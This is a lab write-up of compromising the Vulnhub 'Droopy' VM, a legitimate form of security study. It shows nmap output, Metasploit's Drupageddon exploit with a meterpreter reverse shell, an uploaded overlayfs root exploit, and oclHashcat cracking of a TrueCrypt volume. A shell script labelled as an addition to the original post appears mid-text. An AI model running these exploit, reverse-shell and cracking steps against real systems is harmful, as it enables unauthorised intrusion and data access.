Vulnhub – Droopy: v0.2

Introduction

This is a quick post about how to hack this vulnerable virtual machine found on the Vulnhub website. Just to be clear, I am not a security professional; I am just learning and preparing myself for the OSCP exam. If you find any mistakes, please let me know.

Walkthrough

First we do some network discovery with netdiscover:

[image: netdiscover output]

We see that the host is at 192.168.1.159. Let's do an nmap scan:

nmap -sS -A -O -vv 192.168.1.159 -Pn > nmap.txt

PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud…
MAC Address: 00:0C:29:4A:B9:32 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.0

Nmap shows that this machine hosts a website on an Apache web server with Drupal running on it. I investigated the site and it requires a login and password. Fire up the Metasploit Framework and let's do a quick check to find an exploit suitable for our victim. Because Drupal uses a MySQL database, it's fairly obvious that a SQL injection could work.

[image: Metasploit search results for Drupal]

I chose the third one and crossed my fingers. Boom, we have a meterpreter connection.

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon) > options

Module options (exploit/multi/http/drupal_drupageddon):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
RHOST      192.168.1.159    yes       The target address
RPORT      80               yes       The target port
TARGETURI  /                yes       The target URI of the Drupal installation
VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.1.200    yes       The listen address
LPORT  4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Drupal 7.0 - 7.31
msf exploit(drupal_drupageddon) > exploit

[*] Started reverse TCP handler on 192.168.1.200:4444
[*] 192.168.1.159:80 - Testing page
[*] 192.168.1.159:80 - Creating new user SsozXsiTZb:UldknxsZnY
[*] 192.168.1.159:80 - Logging in as SsozXsiTZb:UldknxsZnY
[*] 192.168.1.159:80 - Trying to parse enabled modules
[*] 192.168.1.159:80 - Enabling the PHP filter module
[*] 192.168.1.159:80 - Setting permissions for PHP filter module
[*] 192.168.1.159:80 - Getting tokens from create new article page
[*] 192.168.1.159:80 - Calling preview page. Exploit should trigger...
[*] Sending stage (33068 bytes) to 192.168.1.159
[*] Meterpreter session 9 opened (192.168.1.200:4444 -> 192.168.1.159:35380) at 2016-04-19 11:06:36 +0200

meterpreter >

Good news. Let's look around and get information out of the system. I used the sysinfo command; let's see what we have.

meterpreter > sysinfo
Computer : droopy
OS : Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64
Meterpreter : php/php
meterpreter >

So this is an Ubuntu machine with an old kernel. I'm trying my luck and checking whether this machine is vulnerable to the overlayfs vulnerability, what user permissions I have, and whether I am able to compile my exploit with gcc and run it.

First, transfer the exploit to the /tmp folder with meterpreter's upload command and try to execute it:

meterpreter > getuid
Server username: www-data (33)
meterpreter > upload /root/Downloads/37292.c /tmp
[*] uploading : /root/Downloads/37292.c -> /tmp
[*] uploaded : /root/Downloads/37292.c -> /tmp/37292.c
meterpreter > shell
Process 1256 created.
Channel 1 created.
cd /tmp
gcc 37292.c -o exploit
chmod +x exploit
./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# whoami
root
#

Nice, we have root access to the system, so let's find the flag. Usually the flag is in the root directory, so let's see what we have.

[image: directory listing showing dave.tc]

Dave.tc? Wut? After googling a bit I found that the .tc extension could be a password-protected TrueCrypt file. Google says that TrueCrypt is discontinued and that password-protected volumes can be cracked with the proper program and a good dictionary. My first thought was oclHashcat because I have an AMD card, while truecrack in Kali Linux supports Nvidia cards (only?). I didn't research whether it supports AMD too, because I am happy with oclHashcat. When I downloaded this vulnerable machine I saw two hints:

1.) Grab a copy of the rockyou wordlist.

2.) It’s fun to read other people’s email.

Okay, I have the rockyou wordlist, so let's check /var/mail:

[image: contents of /var/mail]

Okay, let’s rock:

oclHashcat64.exe -a 0 -m 6211 -p : --session=all -o "D:\Penetration\HASHGPUCRACK\dave_found.txt" --outfile-format=3 -w 3 --gpu-temp-disable "C:\Users\media\Desktop\dave.tc" "D:\Penetration\wordlist\rockyou.txt"

Exhausted. Nothing. Several hours later, still nothing. I tried applying rules (best64) and different dictionaries; nothing. The second hint could also be a clue, so I did a dictionary combination attack (I downloaded lyrics from The Jam, built a dictionary from them and combined it with rockyou). Still no luck. Will I fail at this point? It was so easy until now. TRY HARDER! So I took a break, and when I sat in front of my computer again I had a clue. What if I am using the wrong hashing algorithm? Some guys on the hashcat forums mentioned that one should try the SHA512 algorithm instead of RIPEMD160. Okay, fire up oclHashcat again.

oclHashcat64.exe -a 0 -m 6221 -p : --session=all -o "D:\Penetration\HASHGPUCRACK\dave_found.txt" --outfile-format=3 -w 3 --gpu-temp-disable "C:\Users\media\Desktop\dave.tc" "D:\Penetration\wordlist\rockyou.txt"
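The lesson from the two runs above is that a TrueCrypt header looks like random bytes, so nothing in the file tells you which PBKDF2 hash (6211 is RIPEMD-160, 6221 is SHA-512) or key size the volume was created with. Here is an added example of my own, not from the original post or from hashcat, that simply walks through every non-boot TrueCrypt mode until one cracks; it assumes a hashcat binary on PATH and the mode numbers 6211 to 6233.

```shell
#!/bin/sh
# Added example, not from the original post. A TrueCrypt header is
# indistinguishable from random data, so the PBKDF2 hash (RIPEMD-160,
# SHA-512 or Whirlpool) and XTS key size cannot be read off the file.
# Instead of guessing one mode, try each non-boot mode in turn.
# Assumes a hashcat binary on PATH (override with HASHCAT=... for testing).
HASHCAT="${HASHCAT:-hashcat}"

# hashcat TrueCrypt modes: 621x RIPEMD-160, 622x SHA-512, 623x Whirlpool;
# the last digit is the XTS key size (1 = 512, 2 = 1024, 3 = 1536 bits,
# i.e. one, two or three cascaded ciphers). Single-cipher modes come first
# because they are the cheapest to test.
tc_modes() {
    printf '%s\n' 6211 6221 6231 6212 6222 6232 6213 6223 6233
}

# crack_tc VOLUME WORDLIST OUTFILE
# Prints the mode that cracked the volume and returns 0, or returns 1 when
# every mode was exhausted. The volume file itself is the "hash" input,
# exactly as dave.tc was passed to oclHashcat in the post.
crack_tc() {
    vol=$1; wl=$2; out=$3
    rm -f "$out"
    for m in $(tc_modes); do
        # potfile disabled so a rerun still writes the outfile on success
        "$HASHCAT" -a 0 -m "$m" -w 3 --potfile-disable -o "$out" \
            "$vol" "$wl" >/dev/null 2>&1
        # hashcat only writes the outfile when a password was found
        if [ -s "$out" ]; then
            echo "$m"
            return 0
        fi
    done
    return 1
}

# Usage: crack_tc dave.tc rockyou.txt dave_found.txt
```

On the volume from this post the loop would stop at 6221 after the 6211 run is exhausted, instead of leaving you to guess the next mode.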

After a couple of minutes it finished. Cracked. Okay, let's install TrueCrypt and check what we got. When it prompted for the password I tried copy/paste and... wrong password. OMG, what is happening? Again CTRL+C, CTRL+V, still no luck. Could it be? What if I type the password instead of copying and pasting? Yes, it was my fault. It shows the volume, mounted as drive H:

[image: the mounted TrueCrypt volume on drive H:]

Let's check out this drive. Nothing interesting, some jpg files and a .secret folder. HMMM!

I opened it, and under the .top folder I captured the flag.

[image: the flag]

This was quite fun! Thank you!
